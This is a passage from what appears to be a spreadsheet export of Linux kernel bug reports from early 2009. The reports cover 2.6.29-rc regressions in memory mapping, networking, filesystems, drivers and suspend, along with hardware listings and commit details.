    <t>Latest working kernel version: 2.6.28-xx Earliest failing kernel version: 2.6.29-rc series Distribution: Hardware Environment: Software Environment: X86-Pat enabled Problem Description: There are a number of incorrect assumptions in the PAT code entered for 2.6.29: 1) The code incorrectly assumest that no PTEs set up by vm_insert_pfn() are pointing to RAM memory. Such PTEs will hit vm_insert_pfn() track_pfn_vma_new() reserve_pfn_range() WARN_ON_ONCE() -&gt; arch/x86/mm/pat.c aroucn line 637 2) If is_linear_pfn_mapping() returns true, the code incorrectly reserves the whole VMA each time vm_insert_pfn is called. vm_insert_pfn() track_pfn_vma_new() is_linear_pfn_mapping() -&gt; reserve_pfn_range(paddr, vma_size, prot, 0); 3) The implementation of is_linear_pfn_mapping in include/linux/mm.h is just incorrect and depends on the device offset user-space enters in mmap() static inline int is_linear_pfn_mapping(struct vm_area_struct *vma) { return ((vma-&gt;vm_flags &amp; VM_PFNMAP) &amp;&amp; vma-&gt;vm_pgoff); } A perhaps correct implementation would be static inline int is_linear_pfn_mapping(struct vm_area_struct *vma) { return ((vma-&gt;vm_flags &amp; VM_PFNMAP) &amp;&amp; is_cow_mapping(vma-&gt;vm_flags)); } but then again, it would make no sense to test this from vm_insert_pfn. 4) When this is fixed, track_pfn_vma_new() should also be called from vm_insert_mixed() when that function inserts a PTE pointing to IO / space.</t>
  </si>
  <si>
    <t>some tc commands fail</t>
  </si>
  <si>
    <t>2.6.29-rc6-git5</t>
  </si>
  <si>
    <t>2009-03-02 12:57 UTC</t>
  </si>
  <si>
    <t>2009-03-14 13:19 UTC</t>
  </si>
  <si>
    <t>Subject : some tc commands fail on 2.6.29-rc6-git5, works on 2.6.28.7 Submitter : Joao Correia &lt;joaomiguelcorreia@gmail.com&gt; Date : 2009-03-02 0:36 References : http://marc.info/?l=linux-kernel&amp;m=123595420013357&amp;w=4 Handled-By : Jarek Poplawski &lt;jarkao2@gmail.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>QinQ vlan trunking regression</t>
  </si>
  <si>
    <t>2009-03-02 13:00 UTC</t>
  </si>
  <si>
    <t>2009-03-14 15:25 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.29-rc* QinQ vlan trunking regression Submitter : Bart Trojanowski &lt;bart@jukie.net&gt; Date : 2009-02-28 18:05 References : http://marc.info/?l=linux-kernel&amp;m=123584439115868&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iozone regression with 2.6.29-rc6</t>
  </si>
  <si>
    <t>2009-03-02 13:48 UTC</t>
  </si>
  <si>
    <t>2009-04-06 22:29 UTC</t>
  </si>
  <si>
    <t>Subject : iozone regression with 2.6.29-rc6 Submitter : Lin Ming &lt;ming.m.lin@intel.com&gt; Date : 2009-02-27 9:13 References : http://marc.info/?l=linux-kernel&amp;m=123572630504360&amp;w=4 Handled-By : Wu Fengguang &lt;fengguang.wu@intel.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 1cf6e7d83bf334cc5916137862c920a97aabc018 Author: Nick Piggin &lt;npiggin@suse.de&gt; Date: Wed Feb 18 14:48:18 2009 -0800 mm: task dirty accounting fix Cc: YAMAMOTO Takashi &lt;yamamoto@valinux.co.jp&gt; Signed-off-by: Nick Piggin &lt;npiggin@suse.de&gt; Acked-by: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>undefined reference to `physmap_set_partitions' on powerpc</t>
  </si>
  <si>
    <t>2009-03-02 13:56 UTC</t>
  </si>
  <si>
    <t>2009-03-14 13:24 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.29-rc6 bombs while compiling a kernel for a linkstation/kurobox Submitter : Rogério Brito &lt;rbrito@ime.usp.br&gt; Date : 2009-03-02 9:43 References : http://marc.info/?l=linux-kernel&amp;m=123598702511826&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>filesystem corrupts on heavy I/O</t>
  </si>
  <si>
    <t>ubuntu-server-2.6.27-9 (smp)</t>
  </si>
  <si>
    <t>2009-03-05 08:42 UTC</t>
  </si>
  <si>
    <t>ddi</t>
  </si>
  <si>
    <t>2009-03-19 09:12 UTC</t>
  </si>
  <si>
    <t>Hi Hoping for a bit of advice from here, since the Ubuntu Server team is completely unresponsive. Failing kernel version: 2.6.27-9 Distribution: Ubuntu Server 8.10 Hardware Environment: VMware ESX Problem Description: On one box with particularly heavy database I/O, we're seeing this in the system log: ================== [1099257.456522] EXT4-fs error (device sdb1): ext4_ext_search_right: bad header in inode #2621457: unexpected eh_depth - magic f30a, entries 340, max 340(0), depth 1(2) [1099257.495979] EXT4-fs error (device sdb1): ext4_ext_search_right: bad header in inode #2621457: unexpected eh_depth - magic f30a, entries 328, max 340(0), depth 1(2) [1099257.505934] EXT4-fs error (device sdb1): ext4_ext_search_right: bad header in inode #2621457: unexpected eh_depth - magic f30a, entries 340, max 340(0), depth 1(2) ================== ... ad infinitum. Kernel (version above) installed a couple months ago, never changed since the box does not have internet access per default. dumpe2fs for the filesystem: =================== dumpe2fs 1.41.3 (12-Oct-2008) Last mounted on: &lt;not available&gt; Filesystem UUID: 7adcc7a6-5dd4-4fd5-b988-c92f9429a06c Filesystem magic number: 0xEF53 Filesystem revision #: 1 (dynamic) Filesystem features: has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize Filesystem flags: signed_directory_hash Default mount options: (none) Filesystem state: clean with errors Errors behavior: Continue Filesystem OS type: Linux Inode count: 90177536 Block count: 360683091 Reserved block count: 18034154 Free blocks: 116980051 Free inodes: 90170042 First block: 0 Block size: 4096 Fragment size: 4096 Reserved GDT blocks: 938 Blocks per group: 32768 Fragments per group: 32768 Inodes per group: 8192 Inode blocks per group: 512 Flex block group size: 16 Filesystem created: Tue Dec 2 17:23:58 2008 Last mount time: Wed Feb 18 21:44:25 2009 Last write time: Tue Mar 3 15:19:14 2009 Mount count: 5 Maximum mount count: 30 Last checked: Tue Dec 2 17:23:58 2008 Check interval: 15552000 (6 months) Next check after: Sun May 31 18:23:58 2009 Reserved blocks uid: 0 (user root) Reserved blocks gid: 0 (group root) First inode: 11 Inode size: 256 Required extra isize: 28 Desired extra isize: 28 Journal inode: 8 Default directory hash: half_md4 Directory Hash Seed: 2180b9fc-09e3-445e-8170-302178b2eadd Journal backup: inode blocks Journal size: 128M ======================== (Deceased launchpad report: https://bugs.launchpad.net/bugs/337246) What to do?</t>
  </si>
  <si>
    <t>[PATCH]uvcvideo does not handle out-of-bounds control values correctly</t>
  </si>
  <si>
    <t>2.6.29-rc7</t>
  </si>
  <si>
    <t>2009-03-05 22:25 UTC</t>
  </si>
  <si>
    <t>2012-05-30 14:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: EeePC 901 with CNF7129 webcam (USB ID=04f2:b071) Software Environment: Problem Description: Setting the "Brightness" control to -2147483648 (=0x80000000) will result that the brightness value will be set to 0. Expected result: From V4L2 specification revision 0.24 ( http://v4l2spec.bytesex.org/spec/r10104.htm ): &gt; When the value is out of bounds drivers can choose to take the &gt; closest valid value or return an ERANGE error code, whatever seems &gt; more appropriate. Setting the brightness to -2147483648 shall result -64 (the closest valid value) or ERANGE error. Steps to reproduce: Compile and execute the attached test case which was taken from http://v4l-test.sourceforge.net/ and modified a little bit: test.c:59: VIDIOC_QUERYCTRL, id=9963776 (V4L2_CID_BASE+0), ret1=0, errno1=0 test.c:66: queryctrl = {.id=9963776, .type=1, .name="Brightness", .minimum=-64, .maximum=64, .step=1, .default_value=-10, .flags=0x0, .reserved[]={ 0x0, 0x0 } } test.c:86: VIDIOC_G_CTRL, id=9963776 (V4L2_CID_BASE+0), ret_orig=0, errno_orig=0, control_orig.value=16 test.c:103: VIDIOC_S_CTRL, id=9963776 (V4L2_CID_BASE+0), value=-2147483648, ret_set=0, errno_set=0 test.c:170: VIDIOC_G_CTRL, id=9963776 (V4L2_CID_BASE+0), ret_get=0, errno_get=0, control_new.value=0 test.c:186: FAILED: new value is not converted to the lower limit: control_new.value=0, queryctrl.minimum=-64 test.c:208: VIDIOC_S_CTRL, id=9963776 (V4L2_CID_BASE+0), value=16, ret_set=0, errno_set=0 FAILED</t>
  </si>
  <si>
    <t>cpufreq driver do not expose all data and configuration to /sys</t>
  </si>
  <si>
    <t>2009-03-06 05:21 UTC</t>
  </si>
  <si>
    <t>uzytkownik2@gmail.com</t>
  </si>
  <si>
    <t>2009-04-02 19:35 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 Earliest failing kernel version: 2.6.29-rc7 (also -rc5 and -rc6 but tested only with patchset) Distribution: Gentoo Hardware Environment: Thinkpad R51e Software Environment: Standard stack (although reproduced with only /bin/sh as init) Problem Description: Contrary to documentation there are little files controlling the cpufreq # ls /sys/devices/system/cpu/cpu0/cpufreq/ conservative stats # ls /sys/devices/system/cpu/cpu0/cpufreq/conservative down_threshold ignore_nice_load sampling_rate sampling_rate_min freq_step sampling_down_factor sampling_rate_max up_threshold Steps to reproduce: Boot</t>
  </si>
  <si>
    <t>Hot/Fn Keys do not work EEEPC 1000HE (eeepc_laptop)</t>
  </si>
  <si>
    <t>2009-03-07 10:05 UTC</t>
  </si>
  <si>
    <t>Matthew Gyurgyik</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.7 Earliest failing kernel version: 2.6.29-rc7 (may have been eailier, I haven't tested older rcs) Distribution: Archlinux Hardware Environment: EEEPC 1000HE Problem Description: The function keys on the Asus EEEPC 1000HE do not register any keycodes / acpi code. However, Fn+F1 (Sleep) and the Power Button register keycodes and work as expected. Another note is that the Fn+F5 and Fn+F6 keys work as expected (brighten and dims the display), but do not give any acpi codes. Here is a copy of my kernel config: http://rafb.net/p/GTQiS467.html If you need any extra information, I'll be more than happy to provide it. I do not have a good grasp on how acpi works, so please forgive me if I used the wrong terminology. Steps to reproduce: 1. Compile 2.6.29-rc7 2. Run acpi_listen 3. Press Fn+F2-F10 or anyother special key Expected results output of acpi keycode. Actual results no output.</t>
  </si>
  <si>
    <t>mtd: physmap: NULL pointer dereference in error path</t>
  </si>
  <si>
    <t>commit e480814f138cd5d78a8efe397756ba6b6518fdb6</t>
  </si>
  <si>
    <t>2009-03-07 12:43 UTC</t>
  </si>
  <si>
    <t>2009-03-14 13:31 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] mtd: physmap: Fix NULL pointer dereference in error path Submitter : Atsushi Nemoto &lt;anemo@mba.ocn.ne.jp&gt; Date : 2009-03-06 1:43 References : http://marc.info/?l=linux-kernel&amp;m=123630385119025&amp;w=4 Handled-By : Atsushi Nemoto &lt;anemo@mba.ocn.ne.jp&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123630385119025&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit e480814f138cd5d78a8efe397756ba6b6518fdb6 Author: Atsushi Nemoto &lt;anemo@mba.ocn.ne.jp&gt; Date: Wed Feb 11 13:12:17 2009 -0800 [MTD] [MAPS] physmap: fix wrong free and del_mtd_{partition,device} Signed-off-by: Atsushi Nemoto &lt;anemo@mba.ocn.ne.jp&gt; Reported-by: Matthias Kaehlcke &lt;matthias@kaehlcke.net&gt; Tested-by: Matthias Kaehlcke &lt;matthias@kaehlcke.net&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: David Woodhouse &lt;David.Woodhouse@intel.com&gt; First-Bad-Commit : e480814f138cd5d78a8efe397756ba6b6518fdb6</t>
  </si>
  <si>
    <t>Resume from RAM on PowerBook broken by commit 1fb25cb8b83e85f5bf1a4adb3c9a254c4ce92405</t>
  </si>
  <si>
    <t>commit 1fb25cb8b83e85f5bf1a4adb3c9a254c4ce92405</t>
  </si>
  <si>
    <t>2009-03-07 12:50 UTC</t>
  </si>
  <si>
    <t>2009-03-14 13:17 UTC</t>
  </si>
  <si>
    <t>Subject : commit "radeonfb: Fix resume from D3Cold on some platforms" breaks resume from RAM on PowerBook Submitter : Gaudenz Steinlin &lt;gaudenz@soziologie.ch&gt; Date : 2009-03-04 8:38 References : http://marc.info/?l=linux-kernel&amp;m=123615707313927&amp;w=4 Handled-By : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 1fb25cb8b83e85f5bf1a4adb3c9a254c4ce92405 Author: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; Date: Thu Feb 5 12:06:52 2009 +1100 radeonfb: Fix resume from D3Cold on some platforms First-Bad-Commit : 1fb25cb8b83e85f5bf1a4adb3c9a254c4ce92405</t>
  </si>
  <si>
    <t>2.6.29-rc breaks STD using Intel 945</t>
  </si>
  <si>
    <t>2009-03-07 13:07 UTC</t>
  </si>
  <si>
    <t>2009-04-26 17:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc breaks STD using Intel 945 Submitter : Rolf Eike Beer &lt;eike-kernel@sf-tec.de&gt; Date : 2009-03-04 19:20 References : http://marc.info/?l=linux-kernel&amp;m=123619451406192&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lguest: unhandled trap 13 in current -rc</t>
  </si>
  <si>
    <t>lguest</t>
  </si>
  <si>
    <t>2009-03-07 13:11 UTC</t>
  </si>
  <si>
    <t>2009-03-14 14:13 UTC</t>
  </si>
  <si>
    <t>virtualization_lguest</t>
  </si>
  <si>
    <t>Subject : lguest: unhandled trap 13 in current -rc Submitter : Patrick McHardy &lt;kaber@trash.net&gt; Date : 2009-02-12 7:16 References : http://marc.info/?l=linux-kernel&amp;m=123442306000589&amp;w=4 Handled-By : Rusty Russell &lt;rusty@rustcorp.com.au&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123632261101987&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Transcend microSD card is not recognized by kernel 2.6.28 and Toshiba Tecra M5</t>
  </si>
  <si>
    <t>2009-03-07 17:15 UTC</t>
  </si>
  <si>
    <t>José María Fernández González</t>
  </si>
  <si>
    <t>2010-10-05 09:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.28 Distribution: Gentoo Linux x86 Hardware Environment: Transcend microSD 2GB MM8GR02GUACU-PA Toshiba Tecra M5 with Core2 Duo T7400 and 2GB of memory. The lspci -vv description for the SD controller is 06:0b.3 SD Host controller: Texas Instruments PCIxx12 SDA Standard Compliant SD Host Controller (prog-if 01) Subsystem: Toshiba America Info Systems Device 0001 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (1750ns min, 1000ns max), Cache Line Size: 32 bytes Interrupt: pin D routed to IRQ 23 Region 0: Memory at ff9ff700 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: sdhci-pci Kernel modules: sdhci-pci Software Environment: Gentoo Linux x86 with kernel 2.6.28.5 Problem Description: Some microSD cards (using their size adapter) are not recognized when they are inserted in the Tecra M5 SD slot. I own one of those cards (a Transcend 2GB), which works with Windows XP and Toshiba drivers. Steps to reproduce: 1. Start a Linux distro properly configured. 2. Insert the Transcend microSD in its adapter, and the set in the SD slot. 3. No card is recognized (even no kernel message).</t>
  </si>
  <si>
    <t>Crash on suspend to ram - Netbook datacask Jupiter 1014a</t>
  </si>
  <si>
    <t>2009-03-08 04:08 UTC</t>
  </si>
  <si>
    <t>2009-03-23 18:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.18 works perfectly. Earliest failing kernel version: 2.6.28.7 cashes sometimes. Distribution: EasyPeasy (www.geteasypeasy.org - Ubuntu derivative) Hardware Environment: Netbook datacask Jupiter 1014a lspci -vvv: 00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03) Subsystem: Intel Corporation Device 7270 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: &lt;access denied&gt; Kernel driver in use: agpgart-intel 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at 96280000 (32-bit, non-prefetchable) [size=512K] Region 1: I/O ports at 50c0 [size=8] Region 2: Memory at 80000000 (32-bit, prefetchable) [size=256M] Region 3: Memory at 96300000 (32-bit, non-prefetchable) [size=256K] Capabilities: &lt;access denied&gt; 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 0: Memory at 96200000 (32-bit, non-prefetchable) [size=512K] Capabilities: &lt;access denied&gt; 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) Subsystem: Intel Corporation Device 0268 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at 96340000 (64-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00003000-00004fff Memory behind bridge: 95200000-961fffff Prefetchable memory behind bridge: 0000000090000000-00000000910fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport-driver 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: 94100000-951fffff Prefetchable memory behind bridge: 0000000091100000-00000000920fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport-driver 00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 00001000-00001fff Memory behind bridge: 93100000-940fffff Prefetchable memory behind bridge: 0000000092100000-00000000930fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport-driver 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at 5080 [size=32] Kernel modules: uhci-hcd 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 5060 [size=32] Kernel modules: uhci-hcd 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 11 Region 4: I/O ports at 5040 [size=32] Kernel modules: uhci-hcd 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at 5020 [size=32] Kernel modules: uhci-hcd 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) (prog-if 20) Subsystem: Intel Corporation Device 7270 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at 96344400 (32-bit, non-prefetchable) [size=1K] Capabilities: &lt;access denied&gt; Kernel driver in use: ehci_hcd 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) (prog-if 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: &lt;access denied&gt; Kernel modules: intel-rng 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) (prog-if 80 [Master]) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx+ Latency: 0 Interrupt: pin B routed to IRQ 17 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 50a0 [size=16] Capabilities: &lt;access denied&gt; Kernel driver in use: ata_piix 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) Subsystem: Intel Corporation Device 7270 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 5000 [size=32] Kernel modules: i2c-i801 01:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02) Subsystem: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 220 Region 0: I/O ports at 3000 [size=256] Region 2: Memory at 90010000 (64-bit, prefetchable) [size=4K] Region 4: Memory at 90000000 (64-bit, prefetchable) [size=64K] Expansion ROM at 90020000 [disabled] [size=128K] Capabilities: &lt;access denied&gt; Kernel driver in use: r8169 02:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) Subsystem: Device 1a3b:1026 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 128 bytes Interrupt: pin A routed to IRQ 17 Region 0: Memory at 94100000 (64-bit, non-prefetchable) [size=64K] Capabilities: &lt;access denied&gt; Kernel driver in use: ath5k_pci Kernel modules: ath5k Software Environment: Gnome desktop with maximus and netbook-launcher and a gnome-terminal running. Problem Description: Sometimes when I execute a suspend to ram the system freezes completely. Steps to reproduce:</t>
  </si>
  <si>
    <t>Regression issue with kernel 2.6.29-rc6-git1: high power consumption during sleep</t>
  </si>
  <si>
    <t>2.6.29-rc6-git1</t>
  </si>
  <si>
